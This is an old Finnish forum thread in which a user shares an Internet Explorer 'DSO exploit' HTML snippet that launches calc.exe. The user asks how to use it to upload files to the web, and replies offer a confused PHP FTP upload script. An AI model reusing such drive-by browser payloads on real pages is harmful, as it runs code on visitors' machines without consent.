Kirjautuminen

Haku

Tehtävät

Keskustelu: Nettisivujen teko: DSO Exploit

Monkkats [10.11.2003 16:35:40]

#

Ku mul olis tällänen DSO Exploit-koodi joka avaa ohjelman etäkoneelta:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
	<security>
		<exploit>
			<![CDATA[
			<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="C:\WINDOWS\System32\calc.exe"></object>
			]]>
		</exploit>
	</security>
</xml>

saisko ton DSO Exploitin kautta jotenki tallennettua nettii tiedostoa? (käy muillaki kielillä sama juttu jos joku tietää)

pistemies [10.11.2003 20:04:17]

#

Tarkoitus olisi siis saada tuo calc.exe nettiin? Onnistuu varmaan käyttämällä ftp_put funktiota.

http://www.pm-netti.com/index.php?sivu=14&script=ftp_put

Jos sinä tallennat tuon ensin kotikoneelle yksikseen omaan kansioonsa, sillä tuo ftp_put kopioi koko hakemiston sisällön palvelimelle.

Monkkats [10.11.2003 21:25:04]

#

Aluks mul oli tos jotai 6virhettä kunnes korjailin sitä vähän ja poistin pari kohtaa siit, mut nyt enää 1virhe ja se on:

Parse error: parse error, unexpected T_VARIABLE in /mbnet/s/supercat/testiftphomma/index.php on line 22

oon nii surkee php:ssä etten muista ees enää, että mikä olikaa toi Parse error?

Ton homman lähdekoodi on täl hetkel:

<?php

$ftp_server = "koti.mbnet.fi";
$ftp_user = "supercat";
$ftp_pass = "**********";
$conn_id=ftp_connect($ftp_server);

if (ftp_login($conn_id, $ftp_user, $ftp_pass)) {
echo "Muodostettu etäyhteys $ftp_user@$ftp_server\n";
}
else {
echo "Couldn't connect as $ftp_user\n";
}

$koti_dir = "c:\WINDOWS\system32\calc.exe"; // Kotikoneella oleva kansio
$server_dir = "testiftphomma"; // Palvelimella oleva kansio

function ftp_copy($koti_dir, $server_dir) {

// global $conn_id;

Call $d = dir($koti_dir);

while($file = $d->read()) {

if ($file != "." && $file != "..") {

if (is_dir($koti_dir."/".$file)) {

if (!@ftp_chdir($conn_id, $server_dir."/".$file)) {

ftp_mkdir($conn_id, $server_dir."/".$file);
}

ftp_copy($koti_dir."/".$file, $server_dir."/".$file);
}
else {

$upload = ftp_put($conn_id, $server_dir."/".$file, $koti_dir."/".$file, FTP_BINARY) or exit ("Tiedostojen kopioinnissa vaikeuksia");
}
}
}

$d->close();
} ftp_copy($koti_dir, $server_dir);
echo ("Tiedostot kopioitu palvelimelle");
ftp_close($conn_id);
?>

pistemies [10.11.2003 21:52:11]

#

virhe on tuossa:

koti_dir = "c:\WINDOWS\system32\calc.exe"; // Kotikoneella oleva kansio

Tiedoston nimeä ei tule mainita ollenkaan, vain hakemiston nimi. Mutta muistaakseeni tuossa system32 -kansiossa on muitakin tiedostoja?
Jos sinulla on kotipalvelin, suosittelen tuohon skriptin alkuun esim. tämmöistä:

mkdir("C:/omaftp");
copy("c:\WINDOWS\system32\calc.exe","C:/omaftp/calc.exe");

ja tuohon muutat tuohon $koti_dir="C:/omaftp";
Koodin loppuun voit tehdä vastaavat unlink ja rmdir komennot, niin ei jää turhia roskia...

odys [10.11.2003 21:56:44]

#

Eips.. eikös pitäisi vielä olla: copy("c:\\WINDOWS\\system32\\calc.exe", "C:\\omaftp\\calc.exe");

pistemies [11.11.2003 12:38:39]

#

lainaus:

Eips.. eikös pitäisi vielä olla: copy("c:\\WINDOWS\\system32\\calc.exe", "C:\\omaftp\\calc.exe");

Ei välttämättä. Näkyy toimivan hyvin molemmilla.

Vastaus

Aihe on jo aika vanha, joten et voi enää vastata siihen.

Tietoa sivustosta